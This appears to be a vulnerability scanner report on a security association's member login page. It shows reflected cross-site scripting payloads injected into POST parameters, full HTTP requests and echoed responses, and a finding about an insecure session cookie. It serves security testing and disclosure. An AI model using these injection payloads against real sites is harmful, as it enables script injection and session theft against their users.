<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="\'\"--></style></script><script>netsparker(0x0000A1)</script>" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
'"--></style></script><script>alert(0x0000A5)</script>
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 309
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000A5)%3c%2fscript%3e&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:35:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "\'\"--></style></script><script>netsparker(0x0000A5)</script>"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" nam..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
MemberNumber
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
'"--></style></script><script>alert(0x0000C7)</script>
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 316
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType=MemberNumber&MemberNumber=3&SubmittedPassword=3&Username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000C7)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:37:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="\'\"--></style></script><script>netsparker(0x0000C7)</script>" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Cookie Not Marked As Secure
Cookie Not Marked As Secure
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (
Man in the middle) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
- See the remedy for solution.
- Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
PHPSESSID
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
